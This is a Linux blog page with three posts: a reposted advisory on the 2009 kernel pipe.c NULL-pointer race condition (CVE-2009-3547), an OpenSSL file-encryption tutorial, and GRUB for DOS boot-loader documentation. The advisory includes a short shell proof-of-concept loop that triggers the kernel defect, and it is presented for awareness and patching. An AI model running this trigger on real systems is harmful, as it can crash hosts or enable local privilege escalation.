14 posts in 'Linux'

  1. 2009.11.04 Linux Kernel 'pipe.c' Local Privilege Escalation Vulnerability
  2. 2009.09.02 A simple way to encrypt files using OpenSSL
  3. 2009.07.06 GRUB for DOS boot code to MBR
2009. 11. 4. 09:57

Linux Kernel 'pipe.c' Local Privilege Escalation Vulnerability

The Linux kernel is prone to a local privilege-escalation vulnerability that is caused by a NULL-pointer dereference.

Local attackers can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition.


Exploit:

The following proof of concept is available:

while : ; do
{ echo y ; sleep 1 ; } | { while read ; do echo z$REPLY; done ; } &
PID=$!
OUT=$(ps -efl | grep 'sleep 1' | grep -v grep |
{ read PID REST ; echo $PID; } )
OUT="${OUT%% *}"
DELAY=$((RANDOM * 1000 / 32768))
usleep $((DELAY * 1000 + RANDOM % 1000 ))
echo n > /proc/$OUT/fd/1 # Trigger defect
done


References:


Original: http://www.securityfocus.com


Patch code
http://xorl.wordpress.com/2009/11/03/cve-2009-3547-linux-kernel-pipe-null-pointer-dereference-race-condition/

2009. 9. 2. 18:14

A simple way to encrypt files using OpenSSL

When you use Linux, you occasionally need to encrypt a file. (It is rarely needed day to day, but it is handy when you have to keep some important information in a file. ^^ I understand Windows supports a similar feature, but I have never used it.)

The method I introduce here is file encryption using openssl.

Note: openssl is an open-source library and program developed to support SSL and TLS, the security protocols used on the Internet. Below is a reference site; click it if you would like to know more.

1. Checking that OpenSSL is installed

On RedHat Linux, openssl is installed by default.

To check whether OpenSSL is installed on your RedHat Linux system, first run "rpm -qa | grep openssl". If it is installed, it appears in the list. If you do not have the root account, the command sometimes does not run; in that case, just type openssl. If it is installed, you get the OpenSSL prompt as shown below.

$ openssl
OpenSSL>

2. Encryption with OpenSSL

Now that we know it is installed, let's use the command to encrypt a file.
For the test, first create a file named plain.txt and enter just Hello as its content.

Now let's encrypt this file.

$ openssl des3 -salt -in plain.txt -out encrypted.txt
enter des-ede3-cbc encryption password:
Verifying - enter des-ede3-cbc encryption password:


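You can probably guess most of it from the openssl command line, but briefly: des3 is the encryption algorithm. There are several other algorithms, and you can choose the one you want. (As far as I know, the AES family and the DES3 family are the ones most commonly used.) Put the name of the file to encrypt after "-in" and the name of the encrypted output file after "-out".

The command then asks for a password. Enter the password you want to use. (If you cannot remember this password later, you will not be able to decrypt the file, so be sure to keep it. ^^)

This produces the file encrypted.txt. Try opening it in vi: you will see that it is encrypted and completely unreadable.

3. Decryption with OpenSSL

Now let's go the other way and decrypt the encrypted file.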

$ openssl des3 -d -salt -in encrypted.txt -out plain2.txt
enter des-ede3-cbc decryption password:

The decryption command is similar to the encryption command: you simply add the "-d" option.

Now compare plain.txt with plain2.txt and you will see that decryption worked correctly.
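
The same encrypt, inspect, decrypt and compare procedure as a non-interactive script, added here as an example that is not part of the original post. It assumes OpenSSL 1.1.1 or later, swaps des3 for AES-256-CBC with -pbkdf2 key derivation, and uses constructed file names, passphrases and iteration count.

```shell
#!/bin/sh
# Added example, not from the original post.
# Assumptions: OpenSSL >= 1.1.1 (-pbkdf2/-iter); iteration count is illustrative.

# Encrypt IN to OUT; the passphrase is the first line of PASSFILE, so it
# never appears on the command line or in shell history.
enc_file() {  # enc_file IN OUT PASSFILE
    openssl enc -aes-256-cbc -salt -pbkdf2 -iter 200000 \
        -in "$1" -out "$2" -pass "file:$3"
}

# Decrypt: same cipher and KDF options plus -d, as in the page's step 3.
dec_file() {  # dec_file IN OUT PASSFILE
    openssl enc -d -aes-256-cbc -pbkdf2 -iter 200000 \
        -in "$1" -out "$2" -pass "file:$3"
}

# With -salt the output starts with the ASCII magic "Salted__" followed by
# the 8-byte salt, which is why the file is unreadable in an editor.
is_salted() { [ "$(head -c 8 "$1")" = "Salted__" ]; }

# Round trip on constructed data. A wrong passphrase usually makes openssl
# fail with a padding error, but enc has no integrity check, so compare the
# output with the original instead of trusting the exit code.
roundtrip_demo() {
    dir=$(mktemp -d) || return 1
    ( umask 077
      printf 'Hello\n' > "$dir/plain.txt"
      printf 'constructed-passphrase\n' > "$dir/pass"
      printf 'wrong-passphrase\n' > "$dir/badpass"
      enc_file "$dir/plain.txt" "$dir/encrypted.bin" "$dir/pass" &&
      is_salted "$dir/encrypted.bin" &&
      dec_file "$dir/encrypted.bin" "$dir/plain2.txt" "$dir/pass" &&
      cmp -s "$dir/plain.txt" "$dir/plain2.txt" &&
      { dec_file "$dir/encrypted.bin" "$dir/bad.txt" "$dir/badpass" 2>/dev/null
        ! cmp -s "$dir/plain.txt" "$dir/bad.txt"; }
    ); rc=$?
    rm -rf "$dir"
    return $rc
}

roundtrip_demo && echo "round trip OK"
```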

That was "How to encrypt / decrypt files with OpenSSL".


Source: http://myknowledge.kr/

2009. 7. 6. 15:41

GRUB for DOS boot code to MBR


Installation

There are many ways to install GRUB for DOS. Some of them require modifying MBR or partition boot sector, while others require changing system startup configuration files.

Install GRUB for DOS boot code to MBR

You can use bootlace.com or grubinst.exe to install GRUB for DOS boot code to MBR:

bootlace.com can be used in DOS, Windows 95/98/Me and Linux. Examples:

Install GRUB for DOS boot code to the MBR of first hard drive under DOS, Windows 95/98/Me:

   bootlace 0x80

Install GRUB for DOS boot code to the MBR of IDE channel 0, primary drive under Linux:

   bootlace /dev/hda

Install GRUB for DOS boot code to the MBR of hard drive image file aa.dsk:

   bootlace aa.dsk

grubinst.exe can be used in Linux, FreeBSD and Windows NT family OSs (Windows NT/2000/XP/2003/Vista). Examples:

Install GRUB for DOS boot code to the MBR of first hard drive under Windows NT family OSs:

   grubinst (hd0)

Install GRUB for DOS boot code to the MBR of IDE channel 0, primary drive under Linux/FreeBSD:

   grubinst "(hd0)"

You can also use device names:

   grubinst /dev/hda  (Linux)
   grubinst /dev/ad0  (FreeBSD)

Install GRUB for DOS boot code to the MBR of hard drive image file aa.dsk:

   grubinst aa.dsk

There are many options you can use with bootlace and grubinst; use the -h option to display the help message.

After installing the boot code, you need to copy grldr and menu.lst to the root directory of any FAT16/FAT32/NTFS/EXT2 partition.

Install GRUB for DOS boot code to partition boot sector

You can use grubinst to install GRUB for DOS boot code to partition boot sector. Examples:

Install GRUB for DOS boot code to the first primary partition of the first hard drive:

   grubinst (hd0,0)

or

   grubinst --install-partition=0 (hd0)

or

   grubinst -p=0 (hd0)

Install GRUB for DOS boot code to the first primary partition of the hard drive image file aa.dsk:

   grubinst --install-partition=0 aa.dsk

or

   grubinst -p=0 aa.dsk

Just as in GRUB, extended partition starts with (hd0,4).

After installing the boot code, you need to copy grldr and menu.lst to the partition which you install the boot code on.

Starting GRUB for DOS from DOS

You can load GRUB for DOS in config.sys using one of the following lines:

   DEVICE=GRUB.EXE
   INSTALL=GRUB.EXE
   SHELL=GRUB.EXE

grub.exe can also be launched from DOS prompt or batch file such as AUTOEXEC.BAT.

Starting GRUB for DOS from Linux

First, you need to apply the kexec patch to the Linux kernel.

Then, you can use the following commands to launch GRUB for DOS from Linux:

   kexec -l grub.exe
   kexec -e

Booting GRUB for DOS via the Windows NT/2000/XP/2003 boot manager

Add the following line at the end of boot.ini (this file is hidden):

   C:\grldr="Start GRUB4DOS"

Then copy grldr to C:\, and create the GRUB4DOS configuration file at C:\menu.lst.

Next time you start Windows, there is a new option "Start GRUB4DOS" which can be used to start GRUB for DOS.

Booting GRUB for DOS via the Windows Vista boot manager

Use bcdedit to configure the startup menu:

   bcdedit /create /d "Start GRUB4DOS" /application bootsector
   bcdedit /set {id} device boot
   bcdedit /set {id} path \grldr.mbr
   bcdedit /displayorder {id} /addlast

Then copy grldr.mbr to C:\, grldr and menu.lst to the root directory of any FAT16/FAT32/NTFS/EXT2 partition.

Note: previous version of grldr.mbr can also be used in boot.ini of Windows NT/2000/XP/2003. But it doesn't work anymore with the latest version.

Loading GRUB for DOS using other boot loader

grub.exe can be loaded as a linux kernel.

Load GRUB for DOS using GRUB or another copy of GRUB for DOS, add the following section to menu.lst:

   title Load GRUB4DOS
   kernel /grub.exe

Load GRUB for DOS using syslinux, add the following section to syslinux.cfg:

   label GRUB4DOS
           KERNEL grub.exe

Booting DOS/Windows 9X/Windows NT startup files

In GRUB for DOS, you can load the DOS/Windows 9X/Windows NT startup files directly.

DOS, Windows 95/98/Me:

   title Load io.sys
   root (hd0,0)
   chainloader (hd0,0)/io.sys

Windows NT/2000/XP/2003:

   title Load ntldr
   root (hd0,0)
   chainloader (hd0,0)/ntldr

Windows Vista:

   title Load bootmgr
   root (hd0,0)
   chainloader (hd0,0)/bootmgr


Disk emulation

In GRUB for DOS, disk emulation is implemented using the "map" command.

Direct mapping

Here is an example of mapping an image file as a virtual floppy and booting from it:

   title Boot from floppy image
   map (hd0,0)/aa.img (fd0)
   map --hook
   chainloader (fd0)+1
   rootnoverify (fd0)

map --hook is used to make the mapping created by first map command take effect immediately.

Here is an example of booting from the virtual hard disk:

   title Boot from hard disk image
   map (hd0,0)/aa.dsk (hd0)
   map (hd0) (hd1)
   map --hook
   chainloader (hd0,0)+1
   rootnoverify (hd0,0)

Map the image file as virtual hard disk, but boot from the original disk:

   title Create virtual hard disk
   map (hd0,0)/aa.dsk (hd1)
   map --hook
   chainloader (hd0,0)+1
   rootnoverify (hd0,0)

CDROM emulation is not implemented.

In direct mapping, the image file must be contiguous.

The virtual disk is implemented using INT 13. Therefore, it can be accessed in systems that still use INT 13, such as all kinds of DOS and Windows 9X (compatible mode disk access), and it can't be accessed in systems that use protected mode drivers, such as Linux, FreeBSD and Windows NT family OSs.

Indirect mapping

Indirect mapping is very similar to direct mapping, here is an example:

   title Boot from floppy image
   map --mem (hd0,0)/aa.img (fd0)
   map --hook
   chainloader (fd0)+1
   rootnoverify (fd0)

The --mem option indicates indirect mapping.

In indirect mapping, the image file is copied to memory before the mapping is applied. Therefore, the image file need not be contiguous; however, you must have enough memory to hold the image file.

Auto MBR creation

To create a virtual hard disk, you need an image file that resembles a real hard disk, which consists of an MBR and partition data. If the image file only contains partition data, you need to patch it with an MBR to create a disk image. GRUB for DOS has taken this into consideration. When mapping a disk image file, it tests for the presence of an MBR; if none is found, it creates the MBR automatically using the partition data. For example:

   title Boot from hard disk image
   map --mem (hd0,0)/aa.dsk (hd0)
   map (hd0) (hd1)
   map --hook
   chainloader (hd0,0)+1
   rootnoverify (hd0,0)

aa.dsk can be either a disk image or a partition image; in the latter case, GRUB for DOS will create the MBR on the fly.
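
To tell which of the two kinds of image a file is, and to keep a copy of sector 0 before bootlace or grubinst rewrites it, the following added example (not part of the GRUB for DOS documentation) inspects the first sector. The classification is a heuristic chosen for this example, not the test GRUB for DOS itself performs, and the sample images are constructed.

```shell
#!/bin/sh
# Added example. Heuristic classification of sector 0; this is NOT the test
# GRUB for DOS itself performs. All file names are constructed.

# Print N bytes at OFFSET of FILE as lowercase hex with no separators.
hex_at() {  # hex_at FILE OFFSET N
    od -An -v -tx1 -j "$2" -N "$3" "$1" | tr -d ' \n'
}

# "disk": 0x55AA signature, four partition entries whose status byte is
#         0x00 or 0x80, at least one with a non-zero type byte.
# "partition": signature present and the sector starts with a jump (EB/E9),
#         as file-system boot sectors do, but no usable partition table.
sector0_kind() {  # sector0_kind FILE
    [ "$(hex_at "$1" 510 2)" = "55aa" ] || { echo unknown; return 0; }
    used=0; valid=1
    for off in 446 462 478 494; do
        case $(hex_at "$1" "$off" 1) in 00|80) ;; *) valid=0 ;; esac
        [ "$(hex_at "$1" $((off + 4)) 1)" = "00" ] || used=$((used + 1))
    done
    if [ "$valid" -eq 1 ] && [ "$used" -gt 0 ]; then echo disk; return 0; fi
    case $(hex_at "$1" 0 1) in eb|e9) echo partition ;; *) echo unknown ;; esac
}

# Save sector 0 before bootlace/grubinst overwrites it; prints its SHA-256.
backup_sector0() {  # backup_sector0 FILE BACKUP
    dd if="$1" of="$2" bs=512 count=1 2>/dev/null || return 1
    sha256sum "$2" | cut -d' ' -f1
}

# Write octal-escaped BYTES into FILE at OFFSET without truncating it.
poke() {  # poke FILE OFFSET BYTES
    printf "$3" | dd of="$1" bs=1 seek="$2" conv=notrunc 2>/dev/null
}

# Constructed samples: a disk image with one active FAT32 entry and a
# bare partition image.
make_samples() {  # make_samples DIR
    for f in disk part; do
        dd if=/dev/zero of="$1/$f.dsk" bs=512 count=4 2>/dev/null
        poke "$1/$f.dsk" 510 '\125\252'           # 55 AA signature
    done
    poke "$1/disk.dsk" 446 '\200'                  # entry 1: active (0x80)
    poke "$1/disk.dsk" 450 '\014'                  # entry 1: type 0x0C
    poke "$1/part.dsk" 0 '\353\074\220'            # EB 3C 90 jump
}
```

Restoring the saved sector is the reverse dd with conv=notrunc; compare the printed hash against the backup before writing it back.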

memdisk

The indirect mapping of GRUB for DOS is similar to the function of external tool memdisk from syslinux. In fact, the following two menu entries do roughly the same thing:

   title Boot from virtual disk using internal map command
   map --mem (hd0,0)/aa.dsk (hd0)
   map (hd0) (hd1)
   map --hook
   chainloader (hd0,0)+1
   rootnoverify (hd0,0)

   title Boot from virtual disk using external memdisk
   kernel (hd0,0)/memdisk
   initrd (hd0,0)/aa.dsk

However, memdisk does not support direct mapping or auto MBR creation.


CDROM related subjects

Using ATAPI CDROM in GRUB for DOS

Use the following command to initialize ATAPI CDROM:

   cdrom --init

Then, use the following command to start using ATAPI CDROM:

   map --hook

After map --hook, the CDROM device can be accessed using (cd0), (cd1), etc.

(Note, if you need to use more than one map --hook, perhaps because you are also mapping disk images to memory, then the second and subsequent hook commands need to be map --rehook)

To boot from the first CDROM, use the following commands:

   chainloader (cd0)
   boot

To stop using CDROM:

   map --unhook
   cdrom --stop

The first command removes the (cdN) device mapping, while the second one stops the CDROM driver.

Note: If you boot GRUB for DOS from CDROM, the booting device will be (cd). This device is always accessible. However, if you want to access files from other CDROMs, you still need to initialize them using the above commands.

Examples:

To boot from the first CDROM:

   title Boot From First CDROM
   cdrom --init
   map --hook
   chainloader (cd0)
   boot

Create a bootable CDROM

In GRUB for DOS, you can use grldr to create bootable CDROM:

   mkisofs -R -b grldr -no-emul-boot -boot-load-seg 0x1000 -o bootable.iso iso_root
   mkisofs -R -b grldr -no-emul-boot -boot-load-size 4 -o grldr.iso iso_root

grldr and menu.lst should be placed at the root directory of CDROM image.

The above two commands can both create a bootable CDROM, but they are not totally the same.

The first one tells BIOS to load the whole grldr. However, some buggy BIOS might ignore it and load only a portion of the file, typically one sector (2048 bytes). This will cause the program to fail.

The second one tells BIOS to load only the first sector (2048 bytes), and the program loads the rest from CDROM. This method is safer; it should work for most BIOSes.

Note: you can optionally use the -boot-info-table option, but the info table will be ignored by the program.

Load GRUB for DOS from BCDW

To load GRUB for DOS from BCDW, first copy grldr and menu.lst to the root directory of CDROM image, then add a new line to the [MenuItems] section of BCDW configuration file bcdw.ini:

   \grldr   ; Grub4Dos
